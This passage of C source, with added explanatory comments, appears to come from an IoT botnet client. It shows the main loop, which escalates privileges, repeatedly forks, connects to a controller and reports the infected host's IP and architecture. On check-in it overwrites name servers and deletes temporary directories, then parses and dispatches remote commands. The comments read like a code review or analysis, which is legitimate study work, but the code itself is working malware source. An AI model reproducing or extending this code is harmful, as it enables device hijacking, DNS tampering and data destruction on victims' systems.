  3265. }
  3266. } else {
  3267. }
  3268. chdir("/");
  // Results unchecked; these calls only take effect when the process has the privilege to do so.
  3269. setuid(0);
  3270. seteuid(0);
  // With SIGPIPE ignored, a write to a closed controller socket returns an error
  // instead of terminating the process.
  3271. signal(SIGPIPE, SIG_IGN);
  // Each pass forks again: the process where fork() returns non-zero skips the
  // block and reaches `return 0` at the bottom, so every connection attempt runs
  // under a new pid.
  3272. while(1) {
  3273. if(fork() == 0) {
  // On connection failure: wait 5 seconds and go round the outer loop again.
  3274. if(initConnection()) { sleep(5); continue; }
  3275. sockprintf(mainCommSock, "[ CONNECTED ] IP: %s || Arch Type: %s || Endianness Type: %s", inet_ntoa(ourIP), getBuild(), getEndianness());
  // Run at every successful check-in: resolver overwrite and destructive cleanup.
  3276. UpdateNameSrvs();
  3277. RemoveTempDirs();
  3278. char commBuf[4096];
  3279. int got = 0;
  3280. int i = 0;
  // Command loop: one controller line per iteration until recvLine() returns -1.
  3281. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1) {
  // Reap finished children without blocking and compact the pids[] table,
  // reallocating it one slot larger than the remaining count. malloc() is unchecked.
  3282. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
  3283. unsigned int *newpids, on;
  3284. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
  3285. pids[on - 1] = 0;
  3286. numpids--;
  3287. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
  3288. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
  3289. free(pids);
  3290. pids = newpids;
  3291. }
  3292. commBuf[got] = 0x00;
  3293. trim(commBuf);
  // Lines starting with "PING" are ignored; a line starting with "DUP" ends the process.
  3294. if(strstr(commBuf, "PING") == commBuf) { // PING
  3295. continue;
  3296. }
  3297. if(strstr(commBuf, "DUP") == commBuf) exit(0); // DUP
  3298. unsigned char *message = commBuf;
  // Command lines have the form "!<mask> <COMMAND> [args...]". The mask token is
  // skipped here and not compared against anything in this function.
  3299. if(*message == '!') {
  3300. unsigned char *nickMask = message + 1;
  3301. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
  3302. if(*nickMask == 0x00) continue;
  3303. *(nickMask) = 0x00;
  3304. nickMask = message + 1;
  3305. message = message + strlen(nickMask) + 2;
  // Strip trailing CR/LF, split off the command word and upper-case it in place.
  3306. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
  3307. unsigned char *command = message;
  3308. while(*message != ' ' && *message != 0x00) message++;
  3309. *message = 0x00;
  3310. message++;
  3311. unsigned char *tmpcommand = command;
  3312. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
  // Arguments are split on spaces and copied to the heap one by one.
  // NOTE(review): params has 10 slots and paramsCount is not bounded against that;
  // slots that are not filled stay uninitialised when processCmd reads them.
  3313. unsigned char *params[10];
  3314. int paramsCount = 1;
  3315. unsigned char *pch = strtok(message, " ");
  3316. params[0] = command;
  3317. while(pch) {
  3318. if(*pch != '\n') {
  3319. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
  3320. memset(params[paramsCount], 0, strlen(pch) + 1);
  3321. strcpy(params[paramsCount], pch);
  3322. paramsCount++;
  3323. }
  3324. pch = strtok(NULL, " ");
  3325. }
  3326. processCmd(paramsCount, params);
  // Free the heap copies; params[0] points into commBuf and is not freed.
  3327. if(paramsCount > 1) {
  3328. int q = 1;
  3329. for(q = 1; q < paramsCount; q++) {
  3330. free(params[q]);
  3331. }
  3332. }
  3333. }
  3334. }
  3335. }
  // Reached by the forking parent of each pass and by a connected process once
  // recvLine() has returned -1.
  3336. return 0;
  3337. }
  3338. }